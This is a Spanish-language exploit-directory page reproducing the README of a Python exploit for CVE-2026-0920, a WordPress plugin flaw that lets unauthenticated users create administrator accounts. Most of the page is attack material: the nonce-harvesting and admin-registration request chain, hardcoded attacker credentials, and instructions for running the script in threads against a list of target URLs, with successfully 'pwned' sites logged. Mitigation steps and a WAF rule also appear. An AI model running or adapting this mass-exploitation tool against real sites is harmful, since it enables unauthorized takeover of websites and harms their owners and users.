Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-0920- — LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalada de Privilegios No Autenticada mediante Backdoor para la Creación de Usuarios Administrativos vía el parámetro lakit_bkrole | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2026-0920-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebAprendizaje y Educación
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - Escalada de Privilegios No Autenticada mediante Backdoor para la Creación de Usuarios Administrativos vía el parámetro lakit_bkrole

Ver Repositorio
21hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-0920-

LA-Studio Element Kit para Elementor <= 1.5.6.3 - Escalada de privilegios no autenticada mediante puerta trasera para la creación de usuarios administrativos a través del parámetro lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 El exploit se publica aquí primero. Sigue a @KNxploited en Telegram: tu fuente de élite de CVEs recién divulgados, PoCs funcionales e investigación de seguridad de precisión. Actualizada sin descanso. Diseñada para quienes se mantienen a la vanguardia.


🧠 Descripción general

CVE-2026-0920 es una vulnerabilidad CVSS 9.8 Crítica descubierta en el plugin de WordPress LA-Studio Element Kit for Elementor.

La falla reside en la función ajax_register_handle(), que procesa registros de usuarios no autenticados mediante AJAX. La función no aplica ninguna restricción sobre el parámetro lakit_bkrole, lo que permite a un atacante completamente no autenticado autoasignarse el rol administrator durante el registro, logrando la toma de control total del administrador de WordPress en una sola petición.


💀 Análisis en profundidad de la vulnerabilidad

La causa raíz es la ausencia de una comprobación de capacidades de rol dentro del manejador de registro AJAX del plugin:

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

Por qué esto es crítico:

  • wp_ajax_nopriv_* = accesible por cualquier persona sin autenticación alguna
  • lakit_bkrole acepta cualquier cadena de rol de WordPress, incluido administrator
  • Una sola petición POST crea una cuenta de administrador con plenos privilegios
  • El nonce requerido está expuesto públicamente en el HTML/JS del front-end del sitio
  • Sin limitación de velocidad (rate limiting), sin aplicación de CAPTCHA por defecto, sin requisito de verificación por correo electrónico

⚔️ Cadena de explotación

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ Requisitos

root@kitploit:~
pip install requests colorama
DependenciaPropósito
requestsPeticiones HTTP, manejo de sesiones, gestión de cookies

Se recomienda Python 3.10+ (usa sugerencias de tipo unión str | None).


📂 Estructura de archivos

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 Uso

Paso 1 — Configurar credenciales (opcional)

Abre CVE-2026-0920.py y edita las constantes de la parte superior para establecer los detalles de tu cuenta de administrador deseada:

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

Paso 2 — Preparar los objetivos

Crea list.txt con una URL de objetivo por línea:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

Las URLs sin esquema reciben automáticamente el prefijo https://.


Paso 3 — Ejecutar el exploit

root@kitploit:~
python CVE-2026-0920.py

Se te solicitará:

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

Paso 4 — Supervisar la salida en vivo

El script genera una salida de terminal en tiempo real y con códigos de color:

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
ColorSignificado

Paso 5 — Revisar los resultados

Los exploits exitosos se escriben en success_results.txt:

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

Cada línea contiene el panorama completo: objetivo, credenciales, estado de inicio de sesión, estado de la respuesta AJAX y el nonce utilizado.


🖥️ Referencia de parámetros del script


🔬 Lógica de verificación

El script realiza una verificación en dos etapas para eliminar falsos positivos:

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

Esto elimina los falsos positivos causados por sitios que devuelven 200 OK en AJAX pero fallan silenciosamente en el registro.


📊 Firma de detección

El exploit genera este patrón de red específico, para defensores y autores de WAF:

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

Regla de WAF / IDS (seudocódigo):

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ Mitigación y remediación

Si eres propietario de un sitio, desarrollador o defensor, actúa de inmediato:

  • ✅ Actualiza LA-Studio Element Kit for Elementor a una versión posterior a la 1.5.6.3
  • ✅ Desactiva y elimina el plugin hasta que se instale una versión parcheada confirmada
  • ✅ Audita todas las cuentas de administrador de WordPress: elimina de inmediato cualquier entrada no reconocida
  • ✅ Aplica validación de roles en el lado del servidor: nunca confíes en valores de rol proporcionados por el usuario sin una comprobación de lista blanca
  • ✅ Bloquea a nivel de WAF las peticiones POST no autenticadas a admin-ajax.php que contengan lakit_bkrole
  • ✅ Supervisa los registros de actividad del servidor y de WordPress en busca de llamadas a la acción AJAX lakit_ajax
  • ✅ Activa la autenticación de dos factores en todas las cuentas de administrador existentes como medida de contención
  • ✅ Revisa el aviso de Wordfence y aplica todos los pasos de endurecimiento recomendados

⚠️ Descargo de responsabilidad

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 Autor

AliasNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Sigue a @KNxploited en Telegram CVEs recientes. Exploits funcionales. Investigación de vulnerabilidades en profundidad. Los primeros en saberlo. Los primeros en actuar. No seas el último.


Diseñado con precisión por Nxploited · Solo para investigación de seguridad autorizada · CVSS 9.8 Crítica
Descargar herramienta
CampoDetalles
ID CVECVE-2026-0920
PluginLA-Studio Element Kit for Elementor
Sluglakit / la-studio-element-kit-for-elementor
Versiones afectadasTodas las versiones hasta la 1.5.6.3 inclusive
Tipo de vulnerabilidadEscalada de privilegios no autenticada / Creación de administrador
Vector de ataqueRed — no se requiere autenticación
Puntuación CVSS 3.19.8 CRÍTICA
Vector CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
ImpactoToma de control total del administrador de WordPress
InvestigadorNxploited
colorama
Salida de terminal en color en todas las plataformas
threadingProcesamiento concurrente de múltiples objetivos
reExtracción de nonces basada en expresiones regulares desde HTML/JS
🔵 Cian [*]Informativo — paso en curso
🟢 Verde [+]Señal positiva — éxito parcial o total
🟡 Amarillo [!]Advertencia — resultado ambiguo, requiere revisión
🔴 Rojo [-]Fallo — objetivo no explotable o con errores
ParámetroValor por defectoDescripción
Archivo de objetivoslist.txtArchivo que contiene las URLs de los objetivos
Hilos10 (máx.: 50)Trabajadores concurrentes
ADMIN_EMAIL[email protected]Correo para la cuenta de administrador inyectada
ADMIN_PASSWORDadminSAContraseña de la cuenta de administrador inyectada
ADMIN_USERNAMENx_adminNombre de usuario de la cuenta de administrador inyectada